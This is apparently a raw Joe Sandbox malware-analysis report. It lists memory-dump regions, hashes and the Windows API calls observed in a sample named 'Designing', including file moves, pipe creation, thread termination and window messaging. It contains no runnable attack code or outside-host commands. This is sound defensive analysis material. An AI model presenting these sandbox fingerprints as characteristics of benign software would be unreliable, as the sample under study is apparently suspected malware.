                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                              • Opcode ID: eeb9c4ed70efe54b041f2f6bd8f8379de7bc5e7027a2d6dba9c4c1626522e07c
                                                                                                                                                                              • Instruction ID: d45e86e39b1ff7db7f595520a728221e55fd8b130431475616be81f98557ce6d
                                                                                                                                                                              • Opcode Fuzzy Hash: eeb9c4ed70efe54b041f2f6bd8f8379de7bc5e7027a2d6dba9c4c1626522e07c
                                                                                                                                                                              • Instruction Fuzzy Hash: 8D51AD70A046499FDB10CFA8E895AEEBBF8EF08310F14415BE956E7391D7309A45CF61
                                                                                                                                                                              APIs
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DC30BB
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00DC30C3
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DC3151
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00DC317C
                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00DC31D1
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                              • Opcode ID: 491ab9c9bbc2156715318b03b0db0ab4e5dea57437955fea3349d29cdd33a7da
                                                                                                                                                                              • Instruction ID: 2d802ac78e8c4d97b1d342b0fb78cc413a79a5ee3eb7cf6b99441fd200b3972a
                                                                                                                                                                              • Opcode Fuzzy Hash: 491ab9c9bbc2156715318b03b0db0ab4e5dea57437955fea3349d29cdd33a7da
                                                                                                                                                                              • Instruction Fuzzy Hash: B3416D34A0030AAFCF109F68C885FAEBBA5EF45364F18C159E8156B292D7319A15CBB1
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E0D7CD,?), ref: 00E0E714
                                                                                                                                                                                • Part of subcall function 00E0E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E0D7CD,?), ref: 00E0E72D
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00E0D7F0
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00E0D82A
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0D8B0
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0D8C6
                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 00E0D90C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 3164238972-1173974218
                                                                                                                                                                              • Opcode ID: 067664747cf1b5dc206608faa216d8d68df5bb5c6ce51bca782058092f08854d
                                                                                                                                                                              • Instruction ID: 0bd3b3288958207bb6d17163f9e4dab0731586f48faa274bb86fb23601211402
                                                                                                                                                                              • Opcode Fuzzy Hash: 067664747cf1b5dc206608faa216d8d68df5bb5c6ce51bca782058092f08854d
                                                                                                                                                                              • Instruction Fuzzy Hash: E34146719052189EDF16EBA4DD85BDE77B8AF08340F1014EAE505FB182EA35A7C8CB60
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetInputState.USER32 ref: 00E14310
                                                                                                                                                                              • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00E14367
                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00E14390
                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00E1439A
                                                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E143AB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2256411358-2063206799
                                                                                                                                                                              • Opcode ID: bfc4c3acdf5b528c21b5424f20eb2addda2a72014c2938511a2ce641e7c7cd4c
                                                                                                                                                                              • Instruction ID: 87f319b584fcb97e92f7f1054a31cec1eb5350a79313191bfc4941ef70d316cd
                                                                                                                                                                              • Opcode Fuzzy Hash: bfc4c3acdf5b528c21b5424f20eb2addda2a72014c2938511a2ce641e7c7cd4c
                                                                                                                                                                              • Instruction Fuzzy Hash: 1C3195F0504246EEEB35CB75E849BF67BA8AB00309F04156DD576F22E0E36498C9CB21
                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00E338B8
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E338EB
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E33920
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00E33952
                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00E3397C
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E3398D
                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E339A7
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                              • Opcode ID: 79e887d85adadc025a8854ce42c59f78a045e7eb83f2e0a5698c94ff07366fc4
                                                                                                                                                                              • Instruction ID: 1f2498a899f12c4cd0d6ba7df704a2709a661273a9e596fa4da0c1f2c9abbca8
                                                                                                                                                                              • Opcode Fuzzy Hash: 79e887d85adadc025a8854ce42c59f78a045e7eb83f2e0a5698c94ff07366fc4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5A313934604255DFDB25CF6AEC89F643BE1FB86714F182164F614AB2B5C770A988DB01
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E080D0
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E080F6
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E080F9
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00E08117
                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00E08120
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00E08145
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00E08153
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              • Opcode ID: 678a424bb25c62ce3c4b824c72a6a6c361211dcb29c67fec776cd8e5877c125a
                                                                                                                                                                              • Instruction ID: 923b6217ec9a2c1830716eaf7bc784cf18e0088f18c6d268d14d8828463f1cb5
                                                                                                                                                                              • Opcode Fuzzy Hash: 678a424bb25c62ce3c4b824c72a6a6c361211dcb29c67fec776cd8e5877c125a
                                                                                                                                                                              • Instruction Fuzzy Hash: 3021C732605219AFDF10DFA9DC88CBB77ACEF093647048525F955EB2D0DA70EC868760
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E081A9
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E081CF
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E081D2
                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 00E081F3
                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 00E081FC
                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00E08216
                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00E08224
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                              • Opcode ID: 8fe0a778dfdc9cfb7ec319d835d948d9f15747dc0297704ad68f6d09bbe4697b
                                                                                                                                                                              • Instruction ID: b30bbbd927c4e18e945e6410c0f3b3e04295242c3492b29bcb20b20c847758ee
                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe0a778dfdc9cfb7ec319d835d948d9f15747dc0297704ad68f6d09bbe4697b
                                                                                                                                                                              • Instruction Fuzzy Hash: 29217471604208BFDB14ABA9EC89DAA77ECEF093647048125F955EB1E0DA70EC85CB64
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00E10E99
                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E10ED5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                              • String ID: nul
                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                              • Opcode ID: 67b1f70b450ad0627ccc0684c8eb75f8893c2816bf1d277bbc8f34dfe11bc2b6
                                                                                                                                                                              • Instruction ID: 7a3a9a35f8025fbd85902c3009d05a09979384608cbe0dcf2ae3bde00405e11e
                                                                                                                                                                              • Opcode Fuzzy Hash: 67b1f70b450ad0627ccc0684c8eb75f8893c2816bf1d277bbc8f34dfe11bc2b6
                                                                                                                                                                              • Instruction Fuzzy Hash: 0F214D70604309AFDB309F25DC09ADA7BA8AF58724F204A19FCA5F72D0D7B098D1CB50
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00E10F6D
                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00E10FA8
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                              • String ID: nul
                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                              • Opcode ID: 9311c6bfec0a0bff036c10d5ac3c229bdfe802e6857a4284acd324aa115a5f33
                                                                                                                                                                              • Instruction ID: 62fc4e824f4e51b985d2e6afc55bdf27618fdb9251baeeaf8629e4aa35680abc
                                                                                                                                                                              • Opcode Fuzzy Hash: 9311c6bfec0a0bff036c10d5ac3c229bdfe802e6857a4284acd324aa115a5f33
                                                                                                                                                                              • Instruction Fuzzy Hash: 26219131A043099FDB208F699C05ADA77E8BF59724F200A19F9A1F32D0D7B0D9C1DB50
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA78B1
                                                                                                                                                                                • Part of subcall function 00DA7873: GetStockObject.GDI32(00000011), ref: 00DA78C5
                                                                                                                                                                                • Part of subcall function 00DA7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA78CF
                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00E34BB0
                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00E34BBD
                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00E34BC8
                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00E34BD7
                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00E34BE3
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                              • Opcode ID: c951736dc472fe41571fd2e9ce57bde7636d1fca539460e1a156e4c09e689d7f
                                                                                                                                                                              • Instruction ID: c76b9d3c872ae233df256f242bacf7700b667f132b41ce572d575c5dea8b221d
                                                                                                                                                                              • Opcode Fuzzy Hash: c951736dc472fe41571fd2e9ce57bde7636d1fca539460e1a156e4c09e689d7f
                                                                                                                                                                              • Instruction Fuzzy Hash: D61193B254021EBEEF118E65CC85EE7BFADEF08798F015111B618A2090CA72DC21DBA0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DDDB23: _free.LIBCMT ref: 00DDDB4C
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDBAD
                                                                                                                                                                                • Part of subcall function 00DD2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4), ref: 00DD2D4E
                                                                                                                                                                                • Part of subcall function 00DD2D38: GetLastError.KERNEL32(00E71DC4,?,00DDDB51,00E71DC4,00000000,00E71DC4,00000000,?,00DDDB78,00E71DC4,00000007,00E71DC4,?,00DDDF75,00E71DC4,00E71DC4), ref: 00DD2D60
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDBB8
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDBC3
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDC17
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDC22
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDC2D
                                                                                                                                                                              • _free.LIBCMT ref: 00DDDC38
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                              • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                              • Instruction ID: 8e45b2f03a2a7159c68f591a4edd7d0495c3ffa26ba83e786d1e342972849869
                                                                                                                                                                              • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                              • Instruction Fuzzy Hash: 37111272541704A6D920BBB0CC07FDB7BEEDF14704F424C1BB2A9AE352D675B6044670
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memcmp
                                                                                                                                                                              • String ID: j`
                                                                                                                                                                              • API String ID: 2931989736-1521845545
                                                                                                                                                                              • Opcode ID: eaafd77eff71c94ef84c0921247490b90d42dff0d6f4c8d042ff5f13f5e92ad7
                                                                                                                                                                              • Instruction ID: 3eaf75548de38236d880a893833d9313155f52cdf6937f7c8c474ad30e4eeb82
                                                                                                                                                                              • Opcode Fuzzy Hash: eaafd77eff71c94ef84c0921247490b90d42dff0d6f4c8d042ff5f13f5e92ad7
                                                                                                                                                                              • Instruction Fuzzy Hash: D10192B5640316BBD62056216C82FAB735DDE5139CB005425FE09BB2C2E771EDB0C2B5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E0E328
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00E0E32F
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E0E345
                                                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00E0E34C
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E0E390
                                                                                                                                                                              Strings
                                                                                                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 00E0E36D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString$Message
                                                                                                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                              • API String ID: 4072794657-3128320259
                                                                                                                                                                              • Opcode ID: c844bd84a843cde217d64603b20c884e94b09b67dc52685e0615d5317c3b294c
                                                                                                                                                                              • Instruction ID: 9d55ca66bc4fe0a31c05362b3c5e7e46e317307f17d5f7134b35e3ba90fb8769
                                                                                                                                                                              • Opcode Fuzzy Hash: c844bd84a843cde217d64603b20c884e94b09b67dc52685e0615d5317c3b294c
                                                                                                                                                                              • Instruction Fuzzy Hash: 890186F290430CBFE71197A4AD8EEE77B6CDB08300F0055A1B755F6041EA749E888B71
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 00E11322
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000000,?), ref: 00E11334
                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6), ref: 00E11342
                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00E11350
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E1135F
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E1136F
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000000), ref: 00E11376
                                                                                                                                                                              Memory Dump Source
